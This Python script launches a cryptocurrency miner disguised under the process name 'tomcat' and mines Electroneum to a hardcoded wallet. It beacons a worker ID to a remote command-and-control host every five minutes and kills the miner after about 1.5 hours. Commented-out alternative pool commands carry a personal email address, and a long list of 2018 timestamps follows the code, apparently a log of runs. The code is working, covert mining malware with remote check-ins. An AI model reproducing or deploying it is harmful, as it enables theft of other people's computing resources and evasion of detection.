import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:59:06.104370
#2018-02-17 16:47:05.978977
#2018-02-17 18:35:06.524484
#2018-02-17 20:23:02.102633
#2018-02-17 22:10:03.391154
#2018-02-17 23:54:01.849174
#2018-02-18 01:44:04.519895
#2018-02-18 03:31:05.957097
#2018-02-18 05:18:01.589735
#2018-02-18 07:10:05.325048
#2018-02-18 08:58:04.795962
#2018-02-18 10:45:01.705831
#2018-02-18 12:33:03.543170
#2018-02-18 14:20:05.793962
#2018-02-18 16:11:01.934988
#2018-02-18 17:59:07.069649
#2018-02-18 19:46:02.276139
#2018-02-18 21:29:05.313794
#2018-02-18 23:18:01.578994
#2018-02-19 01:06:06.481147
#2018-02-19 02:52:07.566633
#2018-02-19 04:39:06.166020
#2018-02-19 06:23:06.498739
#2018-02-19 08:12:04.285887
#2018-02-19 10:02:03.644242
#2018-02-19 11:51:03.934060
#2018-02-19 13:44:07.745553
#2018-02-19 15:33:07.165971
#2018-02-19 17:20:01.681518
#2018-02-19 19:07:08.527357
#2018-02-19 20:53:07.376143
#2018-02-19 22:42:01.564153
#2018-02-20 00:27:01.342245
#2018-02-20 02:16:06.198114
#2018-02-20 04:07:03.953374
#2018-02-20 05:50:07.170908
#2018-02-20 07:35:07.458555
#2018-02-20 09:20:06.713005
#2018-02-20 11:04:06.316198
#2018-02-20 12:50:06.338955
#2018-02-20 14:35:07.863746
#2018-02-20 16:18:10.547787
#2018-02-20 18:06:10.373352
#2018-02-20 19:58:07.443249
#2018-02-20 21:46:08.164604
#2018-02-20 23:29:07.590945
#2018-02-21 01:14:01.283190
#2018-02-21 03:01:02.050378
#2018-02-21 04:48:06.864535
#2018-02-21 06:37:05.989538
#2018-02-21 08:23:07.783886
#2018-02-21 10:08:08.491024
#2018-02-21 11:58:03.979185
#2018-02-21 13:47:05.800281
#2018-02-21 15:32:08.218869
#2018-02-21 17:22:05.555453
#2018-02-21 19:09:08.164178
#2018-02-21 20:57:04.197253
#2018-02-21 22:45:08.055949
#2018-02-22 00:36:05.488053
#2018-02-22 02:23:05.257069
#2018-02-22 04:09:01.712366
#2018-02-22 05:53:06.993203
#2018-02-22 07:41:02.134677
#2018-02-22 09:29:04.478508
#2018-02-22 11:15:10.366502
#2018-02-22 13:02:08.383444
#2018-02-22 14:50:09.677441
#2018-02-22 16:36:01.863433
#2018-02-22 18:21:01.432769
#2018-02-22 20:12:06.696109
#2018-02-22 21:59:04.682531
#2018-02-22 23:47:06.120393
#2018-02-23 01:34:05.653247
#2018-02-23 03:19:06.930690
#2018-02-23 05:04:07.233991
#2018-02-23 06:48:05.132348
#2018-02-23 08:43:04.975857
#2018-02-23 10:59:08.388496
#2018-02-23 12:54:07.745626
#2018-02-23 14:38:04.225650
#2018-02-23 16:28:02.104402
#2018-02-23 18:14:06.014817
#2018-02-23 19:59:07.966708
#2018-02-23 21:42:06.646678
#2018-02-23 23:34:05.251767
#2018-02-24 01:23:02.183428
#2018-02-24 03:15:08.128838
#2018-02-24 05:00:10.042723
#2018-02-24 06:50:07.533105
#2018-02-24 08:33:02.150726
#2018-02-24 10:19:06.361898
#2018-02-24 12:14:07.218034
#2018-02-24 14:02:07.497184
#2018-02-24 15:51:04.332396
#2018-02-24 17:41:01.560422
#2018-02-24 19:25:03.715798
#2018-02-24 21:15:08.643568
#2018-02-25 01:15:08.013653
#2018-02-25 05:10:08.923305
#2018-02-25 10:46:01.486756